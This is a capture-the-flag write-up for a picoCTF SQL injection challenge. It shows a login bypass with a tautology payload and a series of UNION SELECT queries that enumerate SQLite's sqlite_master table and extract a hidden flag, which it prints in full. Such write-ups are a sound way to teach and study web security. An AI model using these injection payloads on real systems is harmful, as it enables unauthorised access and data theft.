Write-up author: jon-brandy
Can you find the flag on this website? Try to find the flag here.
- SQLiLite
- In this challenge we're given a web app which has a login feature.
- Let's fill both the username and password fields with `' OR "1=1"-- -`.
- Successfully logged in. Now we need to dump the data. Based on the hint, the DBMS might be sqlite3. Let's first find the number of columns that can be viewed (it should be 3, because the page shows us 3, but let's check it again) with this query:
  ```
  ' UNION SELECT 1,2,3-- -
  ```
- Great, now let's dump all the table names from sqlite_master with this query:
  ```
  ' UNION SELECT 1, tbl_name, 3 FROM sqlite_master;--
  ```
- Great, now we know that there are 4 table names in sqlite_master. One thing to note here: in sqlite3, sqlite_master has a column named `sql`, which stores the SQL statement used to create each database object.
- Let's run this query:
  ```
  ' UNION SELECT 1, sql, 3 FROM sqlite_master;--
  ```
- Notice that the more_table table has a column named flag, which is what we're interested in. Let's run this query:
  ```
  ' UNION SELECT 1, flag, 3 FROM more_table;--
  ```
- Got the flag!
picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_98236ce6}